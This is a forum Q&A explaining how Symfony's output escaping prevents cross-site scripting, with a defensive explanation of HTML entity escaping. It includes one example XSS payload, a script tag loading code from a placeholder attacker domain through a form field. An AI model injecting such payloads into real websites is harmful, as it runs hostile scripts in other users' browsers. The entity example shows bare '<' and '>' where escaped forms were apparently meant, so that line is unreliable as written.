How can escaping be used to prevent XSS attacks?

Question

To prevent XSS attacks, output escaping has been enabled;

The above is from symfony,but I don't understand.

Answer 1

XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually javascript) onto someone else's website, where it can run maliciously.

XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter My name is <script src="http://bad.domain/evilscript.js"></script>. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.

In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malcious HTML from rendering. Escaping these characters involves turning them into their entity equivalents < and > (see PHP's htmlspecialchars() function), which will not be interpreted as HTML tags by a browser.

What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.